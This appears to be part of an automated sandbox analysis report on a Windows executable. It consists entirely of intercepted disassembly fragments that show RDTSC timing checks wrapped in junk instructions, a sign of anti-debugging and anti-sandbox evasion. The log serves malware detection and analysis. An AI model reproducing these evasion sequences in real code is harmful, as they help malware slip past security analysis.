              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7066B second address: 4F706AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F646C53F7B8h 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f mov cx, E43Dh 0x00000013 mov esi, 2FDA8739h 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F646C53F7B2h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F706AC second address: 4F706B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F706B2 second address: 4F706B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F706B6 second address: 4F706BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F706BA second address: 4F7070C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F646C53F7B9h 0x0000000e xchg eax, esi 0x0000000f jmp 00007F646C53F7AEh 0x00000014 push eax 0x00000015 jmp 00007F646C53F7ABh 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F646C53F7B0h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7070C second address: 4F70710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70710 second address: 4F70716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70716 second address: 4F70731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70731 second address: 4F70735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70735 second address: 4F7073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7073B second address: 4F7076A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e movzx ecx, di 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F646C53F7ABh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7076A second address: 4F70770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70770 second address: 4F70774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70774 second address: 4F707C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov di, si 0x00000010 pushfd 0x00000011 jmp 00007F646CD14780h 0x00000016 and si, 7F88h 0x0000001b jmp 00007F646CD1477Bh 0x00000020 popfd 0x00000021 popad 0x00000022 push dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F646CD14785h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F707C7 second address: 4F707D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7ACh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F707D7 second address: 4F707DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7084D second address: 4F70854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70854 second address: 4F70876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F646CD14787h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70876 second address: 4F60008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c mov cx, E899h 0x00000010 mov bl, cl 0x00000012 popad 0x00000013 leave 0x00000014 jmp 00007F646C53F7B1h 0x00000019 retn 0004h 0x0000001c nop 0x0000001d cmp eax, 00000000h 0x00000020 setne al 0x00000023 jmp 00007F646C53F7A2h 0x00000025 xor ebx, ebx 0x00000027 test al, 01h 0x00000029 jne 00007F646C53F7A7h 0x0000002b sub esp, 04h 0x0000002e mov dword ptr [esp], 0000000Dh 0x00000035 call 00007F64706BCD9Bh 0x0000003a mov edi, edi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60008 second address: 4F6000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6000E second address: 4F600BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e call 00007F646C53F7B6h 0x00000013 mov ah, F3h 0x00000015 pop edi 0x00000016 mov ebx, ecx 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F646C53F7AFh 0x00000021 jmp 00007F646C53F7B3h 0x00000026 popfd 0x00000027 call 00007F646C53F7B8h 0x0000002c mov cx, 4901h 0x00000030 pop esi 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 pushad 0x00000034 push ebx 0x00000035 pushfd 0x00000036 jmp 00007F646C53F7B6h 0x0000003b and al, 00000048h 0x0000003e jmp 00007F646C53F7ABh 0x00000043 popfd 0x00000044 pop esi 0x00000045 mov si, di 0x00000048 popad 0x00000049 mov ebp, esp 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F646C53F7AEh 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F600BC second address: 4F600C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F600C1 second address: 4F600F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F646C53F7B7h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esp, 2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F646C53F7B2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F600F7 second address: 4F600FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F600FD second address: 4F6012E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov eax, 102B0503h 0x00000012 mov ch, EEh 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F646C53F7B1h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6012E second address: 4F60187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F646CD1477Ah 0x00000009 add ah, FFFFFFF8h 0x0000000c jmp 00007F646CD1477Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F646CD14786h 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 mov esi, 70F379E9h 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F646CD1477Fh 0x0000002c xchg eax, edi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60187 second address: 4F6018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6018B second address: 4F6018F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6018F second address: 4F60195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F601C1 second address: 4F6020F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F646CD14787h 0x00000010 sub edi, edi 0x00000012 jmp 00007F646CD1477Fh 0x00000017 inc ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6020F second address: 4F60215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60215 second address: 4F6021B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6021B second address: 4F6021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6021F second address: 4F60254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F646CD14787h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60254 second address: 4F602A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F646C53F9A0h 0x0000000f pushad 0x00000010 call 00007F646C53F7ACh 0x00000015 movzx esi, di 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F646C53F7AAh 0x00000021 xor cx, B358h 0x00000026 jmp 00007F646C53F7ABh 0x0000002b popfd 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F602A6 second address: 4F602B8 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F602B8 second address: 4F602BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F602BE second address: 4F602C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F602C2 second address: 4F602C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60426 second address: 4F6042C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6042C second address: 4F60430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60430 second address: 4F60434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60544 second address: 4F6054A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F605AC second address: 4F605B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F605B2 second address: 4F50EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F64DC9CD832h 0x00000011 xor eax, eax 0x00000013 jmp 00007F646C518EDAh 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 xor ebx, ebx 0x00000022 cmp eax, 00000000h 0x00000025 je 00007F646C53F903h 0x0000002b call 00007F64706ADA87h 0x00000030 mov edi, edi 0x00000032 jmp 00007F646C53F7B7h 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F646C53F7B4h 0x0000003f jmp 00007F646C53F7B5h 0x00000044 popfd 0x00000045 pushad 0x00000046 mov esi, 29EBB34Dh 0x0000004b push esi 0x0000004c pop edi 0x0000004d popad 0x0000004e popad 0x0000004f push eax 0x00000050 jmp 00007F646C53F7AFh 0x00000055 xchg eax, ebp 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 call 00007F646C53F7ABh 0x0000005e pop eax 0x0000005f jmp 00007F646C53F7B9h 0x00000064 popad 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F50EE4 second address: 4F50EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F50EEA second address: 4F50EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F50EEE second address: 4F50F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F646CD14782h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F50F0C second address: 4F50F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F50F12 second address: 4F50F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F50FB0 second address: 4F50FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7ACh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60ADA second address: 4F60B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 237F73E6h 0x00000008 jmp 00007F646CD14787h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [7544459Ch], 05h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F646CD14785h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60B1A second address: 4F60B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F64DC9BD676h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F646C53F7ACh 0x00000016 sbb esi, 64A87D18h 0x0000001c jmp 00007F646C53F7ABh 0x00000021 popfd 0x00000022 mov eax, 471C8CCFh 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edx, cx 0x0000002f mov ebx, esi 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60BC1 second address: 4F60C52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F646CD14781h 0x00000009 sbb ax, BC26h 0x0000000e jmp 00007F646CD14781h 0x00000013 popfd 0x00000014 mov ecx, 44B9B157h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 pushad 0x00000021 mov si, di 0x00000024 pushfd 0x00000025 jmp 00007F646CD1477Fh 0x0000002a or ah, 0000005Eh 0x0000002d jmp 00007F646CD14789h 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [eax] 0x00000036 jmp 00007F646CD14781h 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F646CD1477Ah 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60CB5 second address: 4F60CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60CBB second address: 4F60CF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c jmp 00007F646CD1477Eh 0x00000011 mov ax, B7A1h 0x00000015 popad 0x00000016 je 00007F64DD188412h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 mov di, E7AAh 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60CF9 second address: 4F60CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60CFF second address: 4F60D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F708A8 second address: 4F70960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007F646C53F7ACh 0x0000000b push eax 0x0000000c jmp 00007F646C53F7ABh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov edx, esi 0x00000015 pushfd 0x00000016 jmp 00007F646C53F7B0h 0x0000001b sbb ecx, 015134E8h 0x00000021 jmp 00007F646C53F7ABh 0x00000026 popfd 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F646C53F7B4h 0x00000031 and ch, 00000048h 0x00000034 jmp 00007F646C53F7ABh 0x00000039 popfd 0x0000003a pushad 0x0000003b jmp 00007F646C53F7B6h 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 popad 0x00000044 xchg eax, esi 0x00000045 jmp 00007F646C53F7AEh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov cl, 4Bh 0x00000050 call 00007F646C53F7B9h 0x00000055 pop ecx 0x00000056 popad 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70960 second address: 4F70981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F646CD1477Ah 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70981 second address: 4F70987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70987 second address: 4F7098C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7098C second address: 4F709C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F646C53F7AAh 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+0Ch] 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 jmp 00007F646C53F7B3h 0x00000018 popad 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F709C0 second address: 4F709C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F709C4 second address: 4F709CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F709CA second address: 4F709E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F64DD182155h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov dh, al 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F709E3 second address: 4F70A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646C53F7B4h 0x00000009 popad 0x0000000a cmp dword ptr [7544459Ch], 05h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70A08 second address: 4F70A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70A0C second address: 4F70A1B instructions: 0x00000000 rdtsc 0x00000002 mov ax, 7EC9h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a mov eax, 70DDBD0Bh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70A1B second address: 4F70A32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F64DD19A1EBh 0x0000000d pushad 0x0000000e mov si, 03DFh 0x00000012 push eax 0x00000013 push edx 0x00000014 mov bx, ax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70ACA second address: 4F70AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70AED second address: 4F70AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 5C2Fh 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70AF6 second address: 4F70AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 6Ch 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70B1B second address: 4F70B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70B21 second address: 4F70B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007F646C53F7ACh 0x00000012 pop esi 0x00000013 rdtsc
